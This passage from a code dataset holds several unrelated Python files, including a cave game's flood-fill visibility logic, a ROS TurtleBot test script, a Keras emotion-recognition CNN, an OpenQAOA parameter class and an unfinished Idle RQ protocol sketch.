unhidden_list = flood_find_unhidden(blk, *coord, timeout_radius=timeout_radius)\n for loc in unhidden_list:\n # Do not set hidden player\n if not (Game.min_x + Game.game_width//2, Game.min_y + Game.game_height//2) == loc:\n blk.set_hidden(*loc, value=True)\n for loc in unhidden_list:\n update_hidden(blk, *loc, iteration=2)\n except HitSearchLimit as e:\n searched_locations += e.searched_locations\n\n update_hidden(blk, x, y)\n else:\n # Unmasking hidden tiles\n neighbor_coords = get_neighbors(x, y)\n valid_coords = []\n for coord in neighbor_coords:\n tile_obj = blk.get_tile(*coord)\n if not tile_obj.adjacent_hidden and blk.get_hidden(*coord):\n valid_coords.append(coord)\n\n # No need to update a tile placed in an open area\n #if len(valid_coords) > 3:\n # valid_coords = []\n searched_locations = []\n for coord in valid_coords:\n # Don't search overlapping regions\n if coord in searched_locations:\n continue\n\n try:\n hidden_list = flood_find_hidden(blk, *coord, ign_x=x, ign_y=y, timeout_radius=timeout_radius)\n for loc in hidden_list:\n blk.set_hidden(*loc, value=False)\n for loc in hidden_list:\n update_hidden(blk, *loc, iteration=1)\n except HitSearchLimit as e:\n searched_locations += e.searched_locations\n update_hidden(blk, x, y)\n\ndef flood_find_hidden(calling_block, x, y, ign_x, ign_y, timeout_radius=Game.map_size):\n 
\"\"\"Try to find hidden adjacent hidden tiles surrounding location\"\"\"\n # SUB function\n to_search = deque()\n found_list = set([(x, y)])\n searched_list = set([(x, y), (ign_x, ign_y)])\n\n neighbors = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n while True:\n for neighbor in neighbors:\n # Do not search previously searched tiles\n if neighbor in searched_list or neighbor in to_search:\n continue\n\n # Exit condition --- ground open tile\n if (not calling_block.get_tile(*neighbor).adjacent_hidden\n and calling_block.get_hidden(*neighbor)):\n if max(abs(neighbor[0] - x), abs(neighbor[1] - y)) > timeout_radius:\n print(to_search)\n raise HitSearchLimit(searched_list)\n found_list.add(neighbor)\n to_search.append(neighbor)\n else:\n searched_list.add(neighbor)\n\n # Use list like queue to to bfs search\n try:\n search_coord = to_search.popleft()\n # pylint: disable=bad-whitespace\n neighbors = [(search_coord[0]+1, search_coord[1] ),\n (search_coord[0], search_coord[1]-1),\n (search_coord[0]-1, search_coord[1] ),\n (search_coord[0], search_coord[1]+1)]\n searched_list.add(search_coord)\n except IndexError:\n return found_list\n\n# pylint: disable=too-many-arguments\ndef flood_find_unhidden(calling_block, x, y, timeout_radius=Game.map_size,\n # Optimizations\n max=max, abs=abs, set=set, deque=deque,\n IndexError=IndexError, HitSearchLimit=HitSearchLimit):\n \"\"\"Try to find unhidden non-adjacent hidden tiles surrounding location\"\"\"\n # SUB function\n log.info(\"flood_find_unhidden called\")\n to_search = deque()\n found_list = set([(x, y)])\n searched_list = set((x, y))\n\n neighbors = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n while True:\n for neighbor in neighbors:\n # Do not search previously searched tiles\n if neighbor in searched_list or neighbor in to_search:\n continue\n # Exit condition --- ground open tile\n if (not calling_block.get_tile(*neighbor).adjacent_hidden\n and not calling_block.get_hidden(*neighbor)):\n if max(abs(neighbor[0] - x), abs(neighbor[1] - y)) > timeout_radius:\n raise HitSearchLimit(searched_list)\n found_list.add(neighbor)\n to_search.append(neighbor)\n else:\n searched_list.add(neighbor)\n\n # Use list like queue to to bfs search\n try:\n search_coord = to_search.popleft()\n # pylint: disable=bad-whitespace\n neighbors = [(search_coord[0]+1, search_coord[1] ),\n (search_coord[0], search_coord[1]-1),\n (search_coord[0]-1, search_coord[1] ),\n (search_coord[0], search_coord[1]+1)]\n searched_list.add(search_coord)\n except IndexError:\n return found_list\n","repo_name":"brycepg/cave-dweller","sub_path":"cave_dweller/hidden_map_handler.py","file_name":"hidden_map_handler.py","file_ext":"py","file_size_in_byte":10489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9108445586","text":"import sys\nimport time\nimport rospy\nimport random\nfrom std_msgs.msg import Bool\nfrom geometry_msgs.msg import Twist\n\n\nclass TestRun:\n cmd_vel = None\n\n def __init__(self):\n rospy.init_node(\"test_run\")\n\n # Create a publisher which can \"talk\" to TurtleBot and tell it to move\n # Tip: You may need to change cmd_vel_mux/input/navi to /cmd_vel if you're not using TurtleBot2\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n self.do_test()\n\n def shutdown(self):\n # stop turtlebot\n rospy.loginfo(\"Stop TurtleBot\")\n # a default Twist has linear.x of 0 and angular.z of 0. 
So it'll stop TurtleBot\n self.cmd_vel.publish(Twist())\n\n stop_robot_runner = rospy.Publisher('/robot_runner/run_completed', Bool, queue_size=1)\n rospy.sleep(1)\n\n while True:\n if stop_robot_runner.get_num_connections() > 0:\n stop_robot_runner.publish(True)\n break\n\n # sleep just makes sure TurtleBot receives the stop command prior to shutting down the script\n rospy.sleep(1)\n sys.exit(0)\n\n def do_test(self):\n # TurtleBot will stop if we don't keep telling it to move. How often should we tell it to move? 10 HZ\n r = rospy.Rate(10)\n\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = 0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n # Perform 2 passes, with random sleeps so the timing is non-deterministic.\n for i in range(0, 2):\n # publish the velocity\n for x in range(0, 20): # 20 = 2 seconds, r.sleep takes 0.1s (10Hz)\n self.drive_forwards()\n r.sleep()\n\n self.stop_driving()\n rnd = random.randint(1, 3)\n time.sleep(rnd) # Random sleep to generate random energy usage patterns\n\n for y in range(0, 10):\n self.drive_backwards()\n r.sleep()\n\n self.stop_driving()\n rnd = random.randint(1, 3)\n time.sleep(rnd) # Random sleep to generate random energy usage patterns\n\n for y in range(0, 10):\n self.drive_backwards()\n r.sleep()\n\n self.stop_driving()\n\n # Test run done, shutdown\n self.shutdown()\n\n def drive_forwards(self):\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = 0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n self.cmd_vel.publish(move_cmd)\n\n def drive_backwards(self):\n # Twist is a datatype for velocity\n move_cmd = Twist()\n # let's go forward at 0.2 m/s\n move_cmd.linear.x = -0.2\n # let's turn at 0 radians/s\n move_cmd.angular.z = 0\n\n self.cmd_vel.publish(move_cmd)\n\n def stop_driving(self):\n self.cmd_vel.publish(Twist())\n\n\nif __name__ == \"__main__\":\n TestRun()\n","repo_name":"StanSwanborn/robot-runner","sub_path":"examples/ros1/experiments/vu_battsim_18.04/scripts/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14799420342","text":"#!/usr/bin/env python\n\nimport tkinter\n\n\nclass MyApp(tkinter.Frame):\n def __init__(self, master):\n super().__init__(master)\n self.pack()\n \n self.cv = tkinter.Canvas(self, width=600, height=200)\n self.cv.pack()\n \n self.cv.create_arc(20, 20, 180, 180, fill=\"orange\", width=3, style=\"pieslice\")\n self.cv.create_arc(220, 20, 380, 180, fill=\"orange\", width=3, style=\"chord\")\n self.cv.create_arc(420, 20, 580, 180, fill=\"orange\", width=3, style=\"arc\")\n\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n app = MyApp(root)\n app.mainloop()\n","repo_name":"Eskimo-SVD/Oliver_private_Bude","sub_path":"Python-Buch/36_Grafische_Benutzeroberflaechen/TkInter/canvas/arc.py","file_name":"arc.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29162586659","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\nm = [[0] * 3 for _ in range(n)]\nsum = [[0] * 3 for _ in range(n)]\n\nfor i in range(n):\n m[i] = list(map(int, sys.stdin.readline().rstrip().split()))\n\n# store the costs of the first house\nsum[0][0] = m[0][0]\nsum[0][1] = m[0][1]\nsum[0][2] = m[0][2]\n\n# from the 2nd house on, store the possible minimum costs in sum (index error if n is 1)\nfor i in range(1, n):\n sum[i][0] = 
min(sum[i-1][1], sum[i-1][2]) + m[i][0]\n    sum[i][1] = min(sum[i-1][0], sum[i-1][2]) + m[i][1]\n    sum[i][2] = min(sum[i-1][0], sum[i-1][1]) + m[i][2]\n\n# Print the minimum sum at the nth row\nprint(min(sum[n-1]))\n","repo_name":"Simu96/study_baekjoon","sub_path":"동적 계획법 1/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41885331535","text":"# coding: utf-8\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\n\n# Keras\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Dropout, Activation, Conv2D, MaxPooling2D, Flatten, LeakyReLU, AveragePooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\n\n# Constants\nDIRECTORY = \"ml-2018spring-hw3/\"\nMODEL_DIRECTORY = \"model/\"\nLABEL_MAP = {0: '生氣', 1: '厭惡', 2: '恐懼', 3: '高興', 4: '難過', 5: '驚訝', 6: '中立'}\n\n# Functions\ndef get_training_data(horizontal_flip=False, shuffle_data=False, validation_split=0.0):\n    filepath = sys.argv[1]\n\n    if os.path.exists(filepath):\n        data = pd.read_csv(filepath)\n        x_raw = data[\"feature\"]\n        y_raw = data[\"label\"]\n        \n        # Split features into array & reshape to (48, 48, 1)\n        x = x_raw.str.split(expand=True).values.reshape(-1, 48, 48, 1).astype('int')\n        # One hot encoding\n        y = np_utils.to_categorical(y_raw)\n        # Add fliplr image to label 1\n        if horizontal_flip:\n            (x, y) = add_fliplr_image(x, y, y_raw, 1)\n        if shuffle_data:\n            (x, y) = shuffle(x, y)\n        \n        # Split validation set\n        if validation_split > 0.0 and validation_split <= 1.0:\n            valid_size = int(validation_split*len(x))\n            x_train = x[:-valid_size]\n            x_valid = x[-valid_size:]\n            y_train = y[:-valid_size]\n            y_valid = y[-valid_size:]\n        else:\n            x_train = x\n            y_train = y\n            x_valid = []\n            y_valid = []\n    else:\n        print(\"Error: No such file at %s\" % filepath)\n        sys.exit(1)  # fail fast: the names returned below would be undefined otherwise\n\n    return (x_train, y_train), (x_valid, y_valid), (x_raw, y_raw)\n    \ndef output_prediction(y_test, filename=\"output.csv\"):\n    arr = [[i, int(y_test[i])] for i in range(len(y_test))]\n    dw = pd.DataFrame(arr, columns = [\"id\", \"label\"])\n    dw.to_csv(filename, index=False)\n\ndef add_fliplr_image(x_train, y_train, y_raw, label):\n    index = y_raw[y_raw == label].index\n    category = np_utils.to_categorical([label], 7)\n    total_categories = np.repeat(category, len(index), axis=0)\n    total_images = np.empty((0, 48, 48, 1), int)\n\n    for i in index:\n        image = np.fliplr(x_train[i]).reshape(1, 48, 48, 1)\n        total_images = np.append(total_images, image, axis=0)\n\n    x_train = np.concatenate((x_train, total_images), axis=0)\n    y_train = np.concatenate((y_train, total_categories), axis=0)\n    return (x_train, y_train)\n\ndef shuffle(x_train, y_train):\n    seed = np.arange(x_train.shape[0])\n    np.random.shuffle(seed)\n    x_train = x_train[seed]\n    y_train = y_train[seed]\n    return (x_train, y_train)\n\ndef main():\n    (x_train, y_train), (x_valid, y_valid), (x_raw, y_raw) = get_training_data(\n        horizontal_flip=False,\n        shuffle_data=False,\n        validation_split=0.1)\n\n    # Transform to 0 to 1\n    x_train = x_train / 255\n    if len(x_valid) > 0:\n        x_valid = x_valid / 255\n\n    # Normalization\n    if len(x_valid) > 0:\n        x_total = np.concatenate((x_train, x_valid))\n    else:\n        x_total = x_train  # a single array needs no concatenation; np.concatenate((x_train)) would merge the samples\n    mean = np.mean(x_total)\n    std = np.std(x_total)\n\n    x_train = (x_train - mean) / std\n    if len(x_valid) > 0:\n        x_valid = (x_valid - mean) / std\n\n    # 
np.save(\"distribution.npy\", [mean, std])\n\n # Image generator for data augmentation\n train_gen = ImageDataGenerator(\n zca_whitening=False,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.1,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode=\"nearest\")\n\n train_gen.fit(x_train)\n\n # Model configuration\n model = Sequential()\n\n # CNN\n model.add(Conv2D(64, 3, input_shape=(48, 48, 1), padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(128, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(256, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Conv2D(512, 3, padding=\"same\", kernel_initializer=\"glorot_normal\"))\n model.add(LeakyReLU(alpha=0.05))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(2, padding=\"same\"))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n\n # DNN\n model.add(Dense(units=256, kernel_initializer=\"glorot_normal\"))\n model.add(Activation(\"relu\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n\n model.add(Dense(units=512, kernel_initializer=\"glorot_normal\"))\n model.add(Activation(\"relu\"))\n model.add(BatchNormalization())\n model.add(Dropout(0.5))\n\n # Output layer\n model.add(Dense(units=7,activation=\"softmax\"))\n model.summary()\n\n # Checkpoint\n checkpoint_name = MODEL_DIRECTORY + \"checkpoint.h5\"\n checkpoint = ModelCheckpoint(checkpoint_name, monitor=\"val_acc\", verbose=1, save_best_only=True, mode=\"max\")\n\n # Training\n epochs = 100\n batch_size = 128\n steps_per_epoch = (x_train.shape[0]*5) // batch_size\n\n model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=['accuracy'])\n train_history = model.fit_generator(\n train_gen.flow(x_train, y_train, batch_size=batch_size),\n steps_per_epoch=steps_per_epoch,\n epochs=epochs,\n validation_data=(x_valid, y_valid),\n callbacks=[checkpoint])\n\nif __name__ == \"__main__\":\n main()","repo_name":"taiyingchen/ML2018SPRING","sub_path":"hw3/hw3_train.py","file_name":"hw3_train.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30957397695","text":"import pytest\nfrom selenium.webdriver.common.keys import Keys\n\nfrom helpers import get_item_input_box, wait_for_row_in_list_table\n\n\ndef test_layout_and_styling(new_browser):\n browser = new_browser()\n browser.set_window_size(1024, 768)\n\n # She notices the input box is nicely centered\n inputbox = get_item_input_box(browser)\n assert (\n pytest.approx(512, abs=10)\n == inputbox.location[\"x\"] + inputbox.size[\"width\"] / 2\n )\n\n # She starts a new list and sees the input is nicely\n # centered there too\n inputbox.send_keys(\"testing\")\n inputbox.send_keys(Keys.ENTER)\n wait_for_row_in_list_table(browser, \"1: testing\")\n inputbox = get_item_input_box(browser)\n assert (\n pytest.approx(512, abs=10)\n == inputbox.location[\"x\"] + inputbox.size[\"width\"] / 2\n 
)\n","repo_name":"yashkal/tdd-book","sub_path":"app/functional_tests/test_layout_and_styling.py","file_name":"test_layout_and_styling.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16248230051","text":"class Solution:\n def calPoints(self, ops: List[str]) -> int:\n totalSum = 0\n stack = []\n \n for op in ops:\n if op.isdigit() or op[1:].isdigit():\n stack.append(int(op))\n totalSum += int(op)\n elif op == \"C\":\n totalSum -= stack.pop()\n elif op == \"D\":\n stack.append(2 * stack[-1] )\n totalSum += stack[-1]\n else:\n stack.append(stack[-1] + stack[-2])\n totalSum += stack[-1]\n \n \n return totalSum\n ","repo_name":"AmanuelD02/Competitive-Programming","sub_path":"682-baseball-game/682-baseball-game.py","file_name":"682-baseball-game.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373950702","text":"from __future__ import annotations\nfrom typing import Union, Iterable\nfrom abc import ABC\nimport numpy as np\n\nfrom ..ansatz_constructor import QAOADescriptor\n\n\nclass QAOAVariationalBaseParams(ABC):\n \"\"\"\n A class that initialises and keeps track of the Variational\n parameters\n\n Parameters\n ----------\n qaoa_descriptor: `QAOADescriptor`\n Specify the circuit parameters to construct circuit angles to be\n used for training\n\n Attributes\n ----------\n qaoa_descriptor: `QAOADescriptor`\n p: `int`\n cost_1q_coeffs\n cost_2q_coeffs\n mixer_1q_coeffs\n mixer_2q_coeffs\n \"\"\"\n\n def __init__(self, qaoa_descriptor: QAOADescriptor):\n self.qaoa_descriptor = qaoa_descriptor\n self.p = self.qaoa_descriptor.p\n\n try:\n self.cost_1q_coeffs = qaoa_descriptor.cost_single_qubit_coeffs\n self.cost_2q_coeffs = qaoa_descriptor.cost_pair_qubit_coeffs\n self.mixer_1q_coeffs = qaoa_descriptor.mixer_single_qubit_coeffs\n self.mixer_2q_coeffs = qaoa_descriptor.mixer_pair_qubit_coeffs\n except AttributeError:\n self.cost_1q_coeffs = qaoa_descriptor.cost_hamiltonian.single_qubit_coeffs\n self.cost_2q_coeffs = qaoa_descriptor.cost_hamiltonian.pair_qubit_coeffs\n self.mixer_1q_coeffs = qaoa_descriptor.mixer_hamiltonian.single_qubit_coeffs\n self.mixer_2q_coeffs = qaoa_descriptor.mixer_hamiltonian.pair_qubit_coeffs\n\n def __len__(self):\n \"\"\"\n Returns\n -------\n int:\n the length of the data produced by self.raw() and accepted by\n self.update_from_raw()\n \"\"\"\n raise NotImplementedError()\n\n def __repr__(self):\n raise NotImplementedError()\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def mixer_1q_angles(self) -> np.ndarray:\n \"\"\"2D array with the X-rotation angles.\n\n 1st index goes over p and the 2nd index over the qubits,\n to apply X-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def mixer_2q_angles(self) -> np.ndarray:\n \"\"\"2D array with the XX and YY-rotation angles.\n\n 1st index goes over p and the 2nd index over the qubit pairs,\n to apply XX and YY-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def cost_1q_angles(self) -> np.ndarray:\n \"\"\"2D array with the Z-rotation angles.\n\n 1st index goes over the p and the 2nd index over the qubits,\n to apply Z-rotations on.\n \"\"\"\n raise NotImplementedError()\n\n @property\n def cost_2q_angles(self) -> np.ndarray:\n \"\"\"2D array with ZZ-rotation angles.\n\n 1st index goes over the p and the 2nd index over the qubit\n pairs, to apply ZZ-rotations 
on.\n        \"\"\"\n        raise NotImplementedError()\n\n    def update_from_raw(self, new_values: Union[list, np.array]):\n        \"\"\"\n        Update all the parameters from a 1D array.\n\n        The input has the same format as the output of ``self.raw()``.\n        This is useful for ``scipy.optimize.minimize`` which expects\n        the parameters that need to be optimized to be a 1D array.\n\n        Parameters\n        ----------\n        new_values: `Union[list, np.array]`\n            A 1D array with the new parameters. Must have length ``len(self)``\n            and the ordering of the flattened ``parameters`` in ``__init__()``.\n\n        \"\"\"\n        raise NotImplementedError()\n\n    def raw(self) -> np.ndarray:\n        \"\"\"\n        Return the parameters in a 1D array.\n\n        This 1D array is needed by ``scipy.optimize.minimize`` which expects\n        the parameters that need to be optimized to be a 1D array.\n\n        Returns\n        -------\n        np.array:\n            The parameters in a 1D array. Has the same output format as the\n            expected input of ``self.update_from_raw``. Hence corresponds to\n            the flattened `parameters` in `__init__()`\n\n        \"\"\"\n        raise NotImplementedError()\n\n    def update_from_dict(self, new_values: dict):\n        \"\"\"\n        Update all the parameters from a dictionary.\n\n        The input has the same format as the output of ``self.asdict()``.\n\n        Parameters\n        ----------\n        new_values: `dict`\n            A dictionary with the new parameters. Must have the same keys as\n            the output of ``self.asdict()``.\n\n        \"\"\"\n\n        assert isinstance(new_values, dict), f\"Expected dict, got {type(new_values)}\"\n\n        for key, value in new_values.items():\n            if key not in self.asdict().keys():\n                raise KeyError(\n                    f\"'{key}' not in {self.__class__.__name__}, expected keys: {list(self.asdict().keys())}\"\n                )\n            else:\n                if getattr(self, key).shape != np.array(value).shape:\n                    raise ValueError(\n                        f\"Shape of '{key}' does not match. Expected shape {getattr(self, key).shape}, got {np.array(value).shape}.\"\n                    )\n\n        raw_params = []\n        for key, value in self.asdict().items():\n            if key in new_values.keys():\n                raw_params += list(np.array(new_values[key]).flatten())\n            else:\n                raw_params += list(np.array(value).flatten())\n\n        self.update_from_raw(raw_params)\n\n    def asdict(self) -> dict:\n        \"\"\"\n        Return the parameters as a dictionary.\n\n        Returns\n        -------\n        dict:\n            The parameters as a dictionary. Has the same output format as the\n            expected input of ``self.update_from_dict``.\n\n        \"\"\"\n        return {k[2:]: v for k, v in self.__dict__.items() if k[0:2] == \"__\"}\n\n    @classmethod\n    def linear_ramp_from_hamiltonian(\n        cls, qaoa_descriptor: QAOADescriptor, time: float = None\n    ):\n        \"\"\"Alternative to ``__init__`` that already fills ``parameters``.\n\n        Calculate initial parameters from register, terms, weights\n        (specifying a Hamiltonian), corresponding to a linear ramp\n        annealing schedule and return a ``QAOAVariationalBaseParams`` object.\n\n        Parameters\n        ----------\n        qaoa_descriptor: `QAOADescriptor`\n            QAOADescriptor object containing information about terms, weights, register and p\n\n        time: `float`\n            Total annealing time. 
Defaults to ``0.7*p``.\n\n        Returns\n        -------\n        QAOAVariationalBaseParams:\n            The initial parameters for a linear ramp for ``hamiltonian``.\n\n        \"\"\"\n        raise NotImplementedError()\n\n    @classmethod\n    def random(cls, qaoa_descriptor: QAOADescriptor, seed: int = None):\n        \"\"\"\n        Initialise parameters randomly\n\n        Parameters\n        ----------\n        qaoa_descriptor: `QAOADescriptor`\n            QAOADescriptor object containing information about terms,\n            weights, register and p.\n\n        seed: `int`\n            Use a fixed seed for reproducible random numbers\n\n        Returns\n        -------\n        QAOAVariationalBaseParams:\n            Randomly initialised parameters\n        \"\"\"\n        raise NotImplementedError()\n\n    @classmethod\n    def empty(cls, qaoa_descriptor: QAOADescriptor):\n        \"\"\"\n        Alternative to ``__init__`` that only takes ``qaoa_descriptor`` and\n        fills ``parameters`` via ``np.empty``\n\n        Parameters\n        ----------\n        qaoa_descriptor: `QAOADescriptor`\n            QAOADescriptor object containing information about terms, weights, register and p\n\n        Returns\n        -------\n        QAOAVariationalBaseParams:\n            A Parameter object with the parameters filled by ``np.empty``\n        \"\"\"\n        raise NotImplementedError()\n\n    @classmethod\n    def from_other_parameters(cls, params):\n        \"\"\"Alternative to ``__init__`` that takes parameters with fewer degrees\n        of freedom as input.\n\n        Parameters\n        ----------\n        params: `QAOAVariationalBaseParams`\n            The input parameters object to construct the new parameters object from.\n        Returns\n        -------\n        QAOAVariationalBaseParams:\n            The converted parameters s.t. all the rotation angles of the in\n            and output parameters are the same.\n        \"\"\"\n        from . import converter\n\n        return converter(params, cls)\n\n    def raw_rotation_angles(self) -> np.ndarray:\n        \"\"\"\n        Flat array of the rotation angles for the memory map for the\n        parametric circuit.\n\n        Returns\n        -------\n        np.array:\n            Returns all single rotation angles in the ordering\n            ``(x_rotation_angles, gamma_singles, zz_rotation_angles)`` where\n            ``x_rotation_angles = (beta_q0_t0, beta_q1_t0, ... , beta_qn_tp)``\n            and the same for ``z_rotation_angles`` and ``zz_rotation_angles``\n\n        \"\"\"\n        raw_data = np.concatenate(\n            (\n                self.mixer_1q_angles.flatten(),\n                self.mixer_2q_angles.flatten(),\n                self.cost_1q_angles.flatten(),\n                self.cost_2q_angles.flatten(),  # was cost_1q_angles twice, which dropped the ZZ angles\n            )\n        )\n        return raw_data\n\n    def plot(self, ax=None, **kwargs):\n        \"\"\"\n        Plots ``self`` in a sensible way to the canvas ``ax``, if provided.\n\n        Parameters\n        ----------\n        ax: `matplotlib.axes._subplots.AxesSubplot`\n            The canvas to plot itself on\n        kwargs:\n            All remaining keyword arguments are passed forward to the plot\n            function\n\n        \"\"\"\n        raise NotImplementedError()\n\n\nclass QAOAParameterIterator:\n    \"\"\"An iterator to sweep one parameter over a range in a QAOAParameter object.\n\n    Parameters\n    ----------\n    qaoa_params:\n        The initial QAOA parameters, where one of them is swept over\n    the_parameter:\n        A string specifying which parameter should be varied. It has to be\n        of the form ``<attr_name>[i]`` where ``<attr_name>`` is the name\n        of the _internal_ list and ``i`` the index at which it sits. 
E.g.\n        if ``qaoa_params`` is of type ``AnnealingParams``\n        and we want to vary over the second timestep, it is\n        ``the_parameter = \"times[1]\"``.\n    the_range:\n        The range that ``the_parameter`` should be varied over\n\n    Todo\n    ----\n    - Add checks that the number of indices in ``the_parameter`` matches\n      the dimensions of ``the_parameter``\n    - Add checks that the index is not too large\n\n    Example\n    -------\n    Assume qaoa_params is of type ``StandardWithBiasParams`` and\n    has `p >= 2`. Then the following code produces a loop that\n    sweeps ``gammas_singles[1]`` over the range ``(0, 1)`` in steps of 0.4:\n\n    .. code-block:: python\n\n        the_range = np.arange(0, 1, 0.4)\n        the_parameter = \"gammas_singles[1]\"\n        param_iterator = QAOAParameterIterator(qaoa_params, the_parameter, the_range)\n        for params in param_iterator:\n            # do whatever needs to be done.\n            # we have type(params) == type(qaoa_params)\n    \"\"\"\n\n    def __init__(\n        self,\n        variational_params: QAOAVariationalBaseParams,\n        the_parameter: str,\n        the_range: Iterable[float],\n    ):\n        \"\"\"See class documentation for details\"\"\"\n        self.params = variational_params\n        self.iterator = iter(the_range)\n        self.the_parameter, *indices = the_parameter.split(\"[\")\n        indices = [i.replace(\"]\", \"\") for i in indices]\n        if len(indices) == 1:\n            self.index0 = int(indices[0])\n            self.index1 = False\n        elif len(indices) == 2:\n            self.index0 = int(indices[0])\n            self.index1 = int(indices[1])\n        else:\n            raise ValueError(\"the_parameter has too many indices\")\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        # get next value from the_range\n        value = next(self.iterator)\n\n        # 2d list or 1d list?\n        if self.index1 is not False:\n            getattr(self.params, self.the_parameter)[self.index0][self.index1] = value\n        else:\n            getattr(self.params, self.the_parameter)[self.index0] = value\n\n        return self.params\n","repo_name":"entropicalabs/openqaoa","sub_path":"src/openqaoa-core/openqaoa/qaoa_components/variational_parameters/variational_baseparams.py","file_name":"variational_baseparams.py","file_ext":"py","file_size_in_byte":12174,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"31"} +{"seq_id":"5318585371","text":"import socket  # needed for socket.timeout below\n\nfrom troubleMaker import *\n\nPARITY_BIT = 15\nSEQ_BIT = 14\nLAST_INDICATOR_BIT = 13\nACK_BIT = 12\nTIMEOUT_MSEC = 1200 # milli secs\nBUFSIZE = 10000\n \n# def testIdleRQ(num):\n#     print( \"testIdleRQ with parameter num: \", num)\n#     print(\"test import trouble-maker\")\n#     testTroubleMaker(num)\n \ndef mysend(sockfile, buf, len, flags):\n    # Convert the string to a bytearray for mutable operations\n    tmp = bytearray(buf.encode())\n\n    # Print the content of the buffer as byte bits\n    print(\"Buf ({}):\".format(len))\n    for byte in tmp:\n        printbytebits(byte)\n\n    # Make frames\n    # frames = makeframes(tmp, len)\n    frames = makeframes(buf, len)\n    n = len\n    print(\"Frames ({}):\".format(n))\n\n    # Set a timeout for recv() once, before the send loop\n    sockfile.settimeout(TIMEOUT_MSEC / 1000.0)\n\n    # Use a while loop instead of \"for i in range(n)\": rebinding i inside a\n    # for loop has no effect on the next iteration, so the original\n    # \"i -= 1\" retransmission logic never actually retransmitted.\n    i = 0\n    while i < n:\n        print(\"> Sending I-frame {}: \".format(i), end='')\n        printbits(frames[i])\n        printstat(frames[i])\n        mightsend(sockfile, tobits(frames[i]), frames[i])\n\n        try:\n            print(\"Timer Started: Waiting for an ACK frame ...\")\n            ack_data = sockfile.recv(BUFSIZE)  # recv's second argument is flags, so none is passed here\n            print(f\"recv: {ack_data}\")\n\n            if not ack_data:\n                # the Secondary has closed the socket\n                print(\"Secondary has closed connection, indicating proper transmission. ACK frame not needed. Primary process is terminating.\")\n                break\n\n            ack = int.from_bytes(ack_data, byteorder='big')\n            isack = testbit(ack, ACK_BIT)\n            corrup = corrupted(ack)\n            print(f\"> Receiving {'a corrupted' if corrup else 'ACK' if isack else 'NAK'} frame: \", end='')\n            printbits(ack)\n            printstat(ack)\n\n            if isack:\n                NS = testbit(frames[i], SEQ_BIT)\n                NR = testbit(ack, SEQ_BIT)\n                P0 = NS == NR\n                P1 = not corrup\n\n                if P0 and P1:\n                    print(\"Timer Stopped: Valid ACK N(S)=N(R)={} is received.\".format(NR))\n                    i += 1  # acknowledged, move on to the next I-frame\n                    continue\n                if P0:\n                    print(\"ACK frame received is corrupted\")\n                else:\n                    print(\"Error: Expected N(S)=N(R)={}, got N(S)={}\".format(NR, NS))\n                    if not P1:\n                        print(\"Error: Wrong Seq ACK and corrupted\")\n                    else:\n                        print(\"Error: Wrong Seq ACK and not corrupted\")\n            print(\"Resend this I-frame again.\")\n\n        except socket.timeout:\n            print(\"TIMEOUT: No response within {} millisecs. Retransmit this I-frame again.\".format(TIMEOUT_MSEC))\n        except Exception as e:\n            print(\"Error:\", e)\n\n    print(\"All {} frames sent\".format(n))\n    return len\n\ndef myrecv(sockfile, buf, len, flags):\n    frames = [0] * (len + 1)  # frames hold 16-bit values, so a plain list is used instead of a 